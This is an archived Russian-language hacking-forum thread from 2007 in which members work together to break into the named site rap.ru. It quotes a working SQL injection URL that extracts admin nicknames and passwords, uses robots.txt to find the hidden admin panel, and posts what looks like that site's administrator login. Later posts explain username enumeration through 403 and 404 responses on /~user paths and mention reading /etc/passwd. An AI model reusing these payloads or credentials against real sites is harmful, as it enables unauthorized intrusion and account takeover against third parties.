ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.08.2007, 03:32
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Termin@L, бага такая...коннектишься к серверу на 22 порту (кажеца, если не прав - поправьте), и можешь перебирать логины вот так: /~admin /~vasya. Т.е. можно узнать имя юзера.
|
|
|
08.08.2007, 03:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
Сообщение от Termin@L
rap.ru
На данном сайте существует бага, скуль
http://www.rap.ru/page.php?path=/survey&survey_id=-1+union+select+1,2,concat(Nick,char(58),Passwd),4+ from+Admins/*
а также есть админка
http://www.rap.ru/admin
Однако пароли не подходят, поиск других админок ничего не дал, может кто родскажет, что к чему и почему ничего не получается?
тебе ответили в этой теме что делать, а ты неудосужился прочитать..
http://www.rap.ru/robots.txt
Код:
User-agent: *
Disallow: /_Includes
Disallow: /_Admin
Disallow: /_Images
Disallow: /_Files
Disallow: /_Templates
Disallow: /_Style
http://www.rap.ru/_Admin/
Administrator:nfnec
__________________
ПИУ-ПИУ...
|
|
|
|
08.08.2007, 09:04
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Спасибо большое, извиняюсь, забыл
|
|
|
|
09.08.2007, 01:35
|
|
Участник форума
Регистрация: 10.01.2006
Сообщений: 193
Провел на форуме:
553876
Репутация:
81
|
|
Сообщение от Ni0x
первым делом проверь на robots.txt, затем поскань структуру сайта сканером, можно пройтись поисковиком, ручной подбор также использовать можно.
А какой дурак будет в robots прописывать закрытые разделы?! Я на своих сайтах подобные разделы закрываю от индексирования поисковиков с помощью мета-тегов. Да и админки у меня вида Mfi8ernj58j, тем более найти парадный вход эт одно, далее взломать его над))
|
|
|
|
09.08.2007, 07:54
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
Сообщение от George767
А какой дурак будет в robots прописывать закрытые разделы?! Я на своих сайтах подобные разделы закрываю от индексирования поисковиков с помощью мета-тегов. Да и админки у меня вида Mfi8ernj58j, тем более найти парадный вход эт одно, далее взломать его над))
дураки дураками, а тем не менее, адреса админок в robots.txt встречаются очень часто при наличии этого файла.
Тем более, от SQL на сайте никто не застрахован, и твой пароль можно достать при использовании админкой sql-базы.
|
|
|
|
10.08.2007, 02:25
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от n0ne
Termin@L, бага такая...коннектишься к серверу на 22 порту (кажеца, если не прав - поправьте), и можешь перебирать логины вот так: /~admin /~vasya. Т.е. можно узнать имя юзера.
как это на 22 порт? если ты по SSH приконектился, то в подавляющем большинстве случаев пользователей можно посмотреть в /etc/passwd
Ну тоесть можно подобрать имена пользователей... если ответ сервера 403 (Forbidden) значит пользователь существует, если 404 (not found) значит такого несуществует... например ecли зайти http://www.rap.ru/~vasya и серв ответит 403 (Forbidden) (или зайдет по этому адресу) значит пользователь vasya точно существует, а если 404 (not found) то пользователя vasya может не быть...
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
